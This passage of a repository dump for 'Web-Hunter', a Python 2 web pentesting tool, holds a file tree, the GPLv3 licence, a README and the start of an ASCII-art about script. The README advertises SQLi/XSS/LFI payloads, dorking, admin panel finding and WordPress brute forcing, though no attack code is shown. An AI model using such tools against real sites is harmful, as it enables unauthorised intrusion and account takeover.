├── IMG_20210506_134735.jpg ├── LICENSE ├── README.md ├── core ├── about ├── adminfinder.py ├── adminscan.py ├── brute.py ├── dnsall.py ├── dork.sh ├── dorkp.py ├── extractlink.py ├── finder.txt ├── geoip.py ├── lafid.txt ├── lfipd.txt ├── nmap.py ├── scan.txt ├── sqlid.txt ├── subdomain.py ├── username.py ├── whois.py ├── wordpress.py ├── wordpress.txt └── xssd.txt └── menu.py /IMG_20210506_134735.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkhunter141/Web-Hunter/81a897f5c3f229864cc3fd8570cf042ab22fb94a/IMG_20210506_134735.jpg -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Web-Hunter 2 | Advanced Web Application Penetration testing tool & Wordpress name finder and brute forcer Termux & Kali Linux🔥 3 |
4 |

Features 💥

5 |
  • DNS Lookup,Reverse IP Lookup,Zone Transfer,Subnet 6 | Http Headers,Port And Host Scanner
  • 7 |
  • Whois Lookup
  • 8 |
  • Find Subdomain
  • 9 |
  • Extract Link
  • 10 |
  • Geo IP Lookup
  • 11 |
  • Admin Panel Finder
  • 12 |
  • Admin Scanner
  • 13 |
  • No Redirect
  • 14 |
  • TCP Port Scan
  • 15 |
  • Advanced Dork Finder
  • 16 |
  • SQLi/XSS/LFI Payload & Dork
  • 17 |
  • Wordpress Username Finder
  • 18 |
  • Wordpress Brute Force
  • 19 |
    20 |

    📸Screenshot

    21 |
    22 | 23 |
    24 |
    25 |

    Installation :

    26 |
    27 | 28 | ``` 29 | pkg install python2 30 | ``` 31 | ``` 32 | git clone https://github.com/darkhunter141/Web-Hunter 33 | ``` 34 | ``` 35 | cd Web-Hunter 36 | ``` 37 | ``` 38 | python2 menu.py 39 | ``` 40 |

    Copy & Paste

    41 | 42 | ``` 43 | pkg install python2 && git clone https://github.com/darkhunter141/Web-Hunter && cd Web-Hunter && python2 menu.py 44 | ``` 45 |
    46 |

    It Provide only for legal activities. If You Misuse it we are not responsible for this

    47 |

    🖥️ Contact Info

    48 |
  • Our Facebook Page
  • 49 |
  • Our Facebook Community
  • 50 |
  • Our Youtube Channel
  • 51 |
  • Our Blogsite
  • 52 | 53 |
    54 |

    🤠 Devolopers :

    55 |
  • Ashrafi Abir (DarkXploit)
  • 56 |
  • Tanvir Mahamud Shariful (DarkWlof)
  • 57 | -------------------------------------------------------------------------------- /core/about: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os,sys,time 3 | os.system('clear') 4 | print '' 5 | print '''\033[91m `` ``...-...` `` 6 | ` `-+ssmdyshhyysdmdhs/.``` 7 | ``/oydy+:/m:+::+----yN+syyo:``` 8 | `.omMso::/+//////////odms+:/ydy/``` 9 | `.oydNNMo::```` `-oyhds+so:`` 10 | ` :ss+ymo:`. .+///+++- ` 11 | ``+syyy+.` -.`` `... `/oooo+: ` 12 | ``+ssss-. ::-``.` ``....` -+o+++: ` 13 | ` :+sso.. `:-`.`` ` `-` .++-:+- ` 14 | .+:yo-- .:/`` ` -. ` -+:.//` 15 | ` :++s+. `-+` `-.`.` /-::-- ` 16 | ` -o:s-- `./:` -:..` -/.--: ` 17 | ``o-+s-- `-o. ./-. --:.:- ` 18 | ` -++o:- .o:` `:-` .:. `:/-` ---:.- ` 19 | ` /-:oo`` -+:``` ````.::-` ::..:- ` 20 | `.+:o/:- `.//. `` ``:.-/-.` --:-/: `` 21 | ` .:o-s-. ``.:--`` -:..`` ././-.. . 22 | ` :/:/:/-` ```-/` `:` ----:/: ` 23 | ` .:++//:.` `.:` `.` .:::/:-. ` 24 | ` ./:-+://:. `` `-:--:.:::. ` 25 | ```-://:/+//-```` ` .-:/::+///:``` 26 | ```:////+/+yso+o/-:oosss/+o///+/. `` 27 | ````.:+osyhdmssysyNmdhso/:-.``` 28 | ````.:+oyhy+oohddys+:-` 29 | `````....``` ''' 30 | 31 | 32 | def about (b) : 33 | for word in b + '\n': 34 | sys.stdout.write(word) 35 | sys.stdout.flush() 36 | time.sleep(0.03) 37 | 38 | yell='\033[93m' 39 | green= '\033[92m' 40 | print '' 41 | print '' 42 | print '' 43 | about (green+ ' Author : Team Dark Hunter 141') 44 | print '' 45 | about (green+' Facebook Page :https://www.facebook.com/darkhunter141/ ') 46 | print '' 47 | about (green+ ' Youtube : Dark Hunter 141') 48 | print '' 49 | print (green+' Github : https://www.github.com/darkhunter141/') 50 | print '' 51 | about (green+ ' Aim : Fight For Islam And Humanity') 52 | print '' 53 | about ('\033[94m Hi Guys ಠ‿ಠ') 54 | about ('\033[94m We are Dark Hunter 